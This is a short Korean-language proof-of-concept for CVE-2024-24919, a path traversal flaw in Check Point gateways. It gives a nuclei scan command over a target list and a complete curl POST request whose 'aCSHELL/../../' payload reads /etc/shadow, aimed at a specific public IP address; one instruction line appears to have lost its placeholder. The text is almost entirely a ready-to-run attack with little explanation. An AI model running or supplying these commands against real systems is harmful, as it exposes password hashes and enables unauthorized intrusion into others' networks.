
# CVE-2024-24919 개념 증명 익스플로잇 Check Point의 경로 탐색(path traversal) 취약점으로, 조작된 HTTPS POST 요청을 통해 임의 파일 읽기(예: /etc/shadow)를 허용합니다.

nuclei -list chick.txt -t CVE-2024-24919.yaml
를 대상 IP 주소로 바꾸세요. 이 명령은 /etc/shadow 파일에 접근을 시도하며, 이 파일에는 암호 해시가 포함되어 있습니다.
curl --path-as-is -i -s -k -X POST \ -H 'Host: 117.102.198.7 ' \ -H 'Content-Length: 39' \ -H 'Connection: keep-alive' \ --data-binary 'aCSHELL/../../../../../../../etc/shadow' \ 'https://117.102.198.7/clients/MyCRL'
